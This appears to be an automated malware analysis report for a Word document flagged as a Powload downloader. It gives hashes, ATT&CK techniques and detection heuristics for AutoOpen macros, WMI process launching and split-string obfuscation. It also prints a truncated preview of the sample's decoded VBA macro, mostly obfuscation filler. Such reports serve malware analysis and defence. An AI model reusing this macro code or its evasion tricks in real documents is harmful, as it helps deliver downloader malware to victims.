Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3af5d55a42781a34…

MALICIOUS

Office (OLE)

199.6 KB Created: 2019-04-29 12:52:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: a8ca03f4c424fbb885245e1d250464f4 SHA-1: 0f80eebce1c846ca2969c4103ded1f31bd1ff2f3 SHA-256: 3af5d55a42781a34d9ce0abdab4ccec19cc5cd606a67c4d0139c491d9d5b1b42
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The heuristics indicate the use of GetObject and CreateObject to launch the Win32_Process, a technique often used to download and execute further payloads. The ClamAV detection name 'Doc.Downloader.Powload' further supports this assessment.

Heuristics 9

  • ClamAV: Doc.Downloader.Powload-6958023-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6958023-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44777 bytes
SHA-256: ef881939909966ed56cde70950eb7ec776e519d3693014daf84ce6c7237e45be
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cQAA1Z"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SQQGZD"
Attribute VB_Base = "0{0A52E058-AE76-4C27-9AF9-3C356DE2D381}{1DC222BD-0E66-44DA-932D-5E1EDD3B3BDE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "K4AGAAG"
Attribute VB_Base = "0{3AE5A0E8-9AF3-409E-8AD7-486B476535BE}{D73F20A7-FE73-4D41-93DC-6D2E05722A3C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAwDA_"
Sub autoopen()
   If ADDDAUQ = wADAA_4Q Then
ElseIf jAAGA1A = SDABBAZA Then
GABAAAc = (267519638 / 897750405 / sQcAwZ - Cos(756813713 + Tan(EAAAo4)))
ElseIf LQBkZA = pXAAAx Then
cZ4A1AQ = (751133640 / 630216403 / aGABABA - Cos(45757724 + Tan(JD_4AA1A)))
ElseIf DDDDDx = iQAZBCAA Then
ADXcAAD = (135957509 / 149410502 / L_ABG1 - Cos(414211715 + Tan(YADQ_4C)))
End If
   If AACAAAAB = NA4QDXZ Then
ElseIf EQ4DAAGA = WcQkGAUw Then
YAU1kAD = (701778413 / 688661393 / Foc1AUA - Cos(296264843 + Tan(tkc1ZZA)))
ElseIf TCcBA1k = TAcAA1AD Then
UAAAAk4G = (400276892 / 985997369 / zAX_4DAA - Cos(16885558 + Tan(sAUZAA)))
ElseIf VUABB_xD = jUAA4wwB Then
LAkAwBAx = (533428355 / 613803216 / jxwDAXD - Cos(5401070 + Tan(tAUAAZ)))
End If
   If qXoADAXG = J1oXoAU Then
ElseIf OA_cUUA = UA1QU_B Then
UUAwAAA = (271276750 / 302436636 / vGDZBA - Cos(559905168 + Tan(ZQ_ZUA)))
ElseIf h4AD4A = WAUBBkU Then
dUAQGCA_ = (38677001 / 98134683 / hZG_DAUA - Cos(909608368 + Tan(CDAGAQDD)))
ElseIf ckQDAc = uBA_AAB Then
oZUUA1Q = (23018422 / 696015796 / mCGAUA - Cos(95611544 + Tan(TAADDx)))
End If
wAUZAA
   If XoCBQD = YoDXZAA Then
ElseIf dx_XAc = r1xUUABQ Then
MGGQAcA = (601435341 / 716197926 / cA_cDA - Cos(797777708 + Tan(zoUoCA)))
ElseIf EAZAUA = UAoZoB1D Then
cBUAAA = (662716120 / 40666090 / OAADAXQ - Cos(988706587 + Tan(HCA1CxA4)))
ElseIf fA_GZQ = V_ADAA Then
zQBGA1G = (491108569 / 142723745 / GD1kABwA - Cos(245388416 + Tan(iU__Bw)))
End If
   If WAAoUAXC = z4AAAB Then
ElseIf OBAUAAX = MZBAAwQA Then
VBZDAkxU = (795838455 / 990537442 / qkQwABU - Cos(102467672 + Tan(V1CA1xA)))
ElseIf lAkDQQQ = HAU1AQG Then
F4CXcwAA = (211428869 / 132033323 / AAAAcUUA - Cos(755302065 + Tan(QACDAkAX)))
ElseIf MQAUQAoA = jGAkGcA Then
zAxGAAA = (32917629 / 159592512 / CCoxQw - Cos(667485931 + Tan(RBUkowG)))
End If
End Sub
Function LoAwGA1A(AQAQcG)
   If wAAA4UAk = rBc4cZZG Then
ElseIf GABAAxAA = GcGQAQUA Then
MwAQk_A1 = (569852104 / 893177612 / cABAw4 - Cos(986288814 + Tan(zUQABAXD)))
ElseIf EXwZA_A4 = bQZAA_CC Then
FAAcAZ = (643225345 / 169063010 / zAkkCx - Cos(306331002 + Tan(rAxGUDww)))
ElseIf UwAAkGG1 = UBoAxC Then
UCAAUcD = (180426134 / 100177686 / jA1x_o - Cos(70121657 + Tan(zA1ADcB)))
End If
   If qAAQAA = fXQAAxAB Then
ElseIf m4AAAUQc = PQ4cco Then
SAAB4U = (68377651 / 436160027 / uxUQAAx - Cos(844930880 + Tan(WAAA1Q)))
ElseIf iABDAc = YXxxGDAk Then
VAZBCkk = (55184923 / 739573377 / fABUcB - Cos(943206056 + Tan(GUADABB)))
ElseIf CUABUDA = tUwBA_Qo Then
QUQG1Q = (462102489 / 716866647 / fk1UGG - Cos(302115088 + Tan(dZAUkA)))
End If
Set LoAwGA1A = CVar(AQAQcG)
   If akoABQBc = GAkAADk Then
ElseIf dABAUoQA = vDU1_UAU Then
iAAAAxB = (89400408 / 203663596 / XADAcGc - Cos(475634290 + Tan(lQXxxA)))
ElseIf FxcZGAAD = TAG4Q1_ Then
d_xDAD = (408372820 / 937147257 / C41AADA - Cos(539471290 + Tan(sAooAk)))
ElseIf FAoQ_AQ = vAUA1A Then
wDAAQQQZ = (408132955 / 451928321 / HAABxBD - Cos(591810695 + Tan(sXwxAZ)))
End If
   If uUUZUxZQ = N_AQUAAB Then
ElseIf EDUAA1QA = AwZxAkA Then
kAAUQBQ = (674206449 / 849150678 / uUAAAQcD - Cos(75022217 + Tan(R4
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.